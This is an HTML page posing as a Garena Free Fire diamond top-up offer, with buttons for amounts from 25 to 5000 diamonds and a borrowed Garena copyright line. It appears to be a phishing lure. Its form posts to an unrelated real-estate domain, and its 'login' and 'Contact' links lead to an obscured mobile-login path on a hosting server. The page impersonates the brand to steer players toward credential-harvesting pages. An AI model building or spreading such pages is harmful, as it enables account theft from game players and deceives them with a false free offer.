<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<style>
.u{
  width: 99%;
  height: 37px;
  outline: none;
  background: #E1E1E1;
  border: solid;
  border-color: #B5B5B5;
  border-radius: 4px;
}
 .f{
   display: grid ("4");
   width: 100%;
   height: 100px;
   border-radius: 10px;
   border: solid;
   font-size: 45px;
   background-color: #E1FDFF
   }
 .s{
   position: fixed;
   width: 40px;
   height: 40px;
   top: 5px;
   left: 2px;
   }
 .ty{
   position: absolute;
   left: 120px;
   width: 70%;
   padding: 9px;
   border-radius: 4px;
   }
   .s{
     background: url(u.png);
     background-size: 100%;
     border: solid;
     border-radius: 5px;
     background-repeat: no-repeat;
   }
.dropbtn {
  background-color: #4CAF50;
  color: white;
  font-size: 26px;
  border: none;
  border-radius: 5px;
  width: 130px;
  height: 60px;
}

.dropbtn:hover, .dropbtn:focus {
  background-color: #00FF25A1;
  border-radius: 5px;
}

.dropdown {
  position: relative;
  display: inline-block;
}

.dropdown-content {
  display: none;
   position: absolute;
  min-width: 360px;
  min-height: 420px;
  background: none;
  /*overflow: auto;
  box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
*/}

.dropdown-content a {
  color: black;
  padding: 12px 16px;
  text-decoration: none;
  display: block;
}
.ummah{
   display: none;
   position: absolute;
   min-width: 360px;
   min-height: 420px;
   background: none;
   border: none;
}
.ummah a{
   display: block;
   color: black;
}

.dropdown-content a:hover {
   background-color: #FF2222;
   border-radius: 8px;
   box-shadow: 
               0 0 50px #FF0000A1,
               0 0 50px #FF0000A1,
               0 0 50px #FF0000A1,
               0 0 50px #FF0000A1;
}

.show {display:block;}

.btnx{
   width: 140px;
   height: 30px;
   padding: 2px;
   border: none;
   border-radius: 5px;
   font-size: 19px;
   text-align: start;
}
.g{
  width: 50px;
  height: 49px;
  border-radius: 50%;
}
b{
  font-size: 20px;
  position: absolute;
  bottom: 6px;
  left: 80px;
}

   </style>
</head>
<body>
  
<div class="dropdown">
  <button id="myBtn" class="dropbtn">Menu </button>
  <div id="myDropdown" class="dropdown-content">
    <a class="btnx" href="
https://sani-king.github.io/topup/">Home</a><br />
    <a class="btnx" href=" https://ded4950.inmotionhosting.com/~videos/?dir=Ly8vbW9iaWxlL2xvZ2luLz9pPSZhbXA7aT1KQ0VGSA==&CgmjJ ">login</a><br>
    <a class="btnx" href=" https://ded4950.inmotionhosting.com/~videos/?dir=Ly8vbW9iaWxlL2xvZ2luLz9pPSZhbXA7aT1KQ0VGSA==&CgmjJ ">Contact</a><br>
  </div>
</div>


  <div class="ty">
    <form action=" https://chrishoustonrealestate.com/ZW55LzJkNlczRjB1OHczbzRp " method="post">
      <button class="f">25 💎 </button><br /><br />
      <button class="f">50 💎 </button><br><br>
      <button class="f">100 💎 </button><br><br>
      <button class="f">210 💎 </button><br><br>
      <button class="f">310 💎 </button><br><br>
      <button class="f">420 💎 </button><br><br>
      <button class="f">520 💎 </button><br><br>
      <button class="f">740 💎 </button><br><br>
      <button class="f">1080 💎 </button><br /><br />
      <button class="f">1500 💎 </button><br /><br />
      <button class="f">2000 💎 </button><br /><br />
      <button class="f">2500 💎 </button><br /><br />
      <button class="f">3000 💎 </button><br /><br />
      <button class="f">3600 💎 </button><br /><br />
      <button class="f">4500 💎 </button><br /><br />
      <button class="f">5000 💎 </button>
      <br><br><br><br><br>
      <footer class="fuck">
        <img class="g" src="img.png" alt="img.png"><b>
        copyright from <a href="#garena">@Garena Free Fire</a> 16 June 2018, Update at 17 May 2022</b>
      </footer>
    </form>
  </div>
  </div>



<!--- script--->
<script>
// Get the button, and when the user clicks on it, execute myFunction
document.getElementById("myBtn").onclick = function() {myFunction()};

document.getElementById("bxt").onclick = function()
{DhurBal()};


function myFunction() {
  document.getElementById("myDropdown").classList.toggle("show");
  
     }
function DhurBal(){
 document.getElementById("oida").classList.toggle("show");
  }

</script>
</body>
</html>
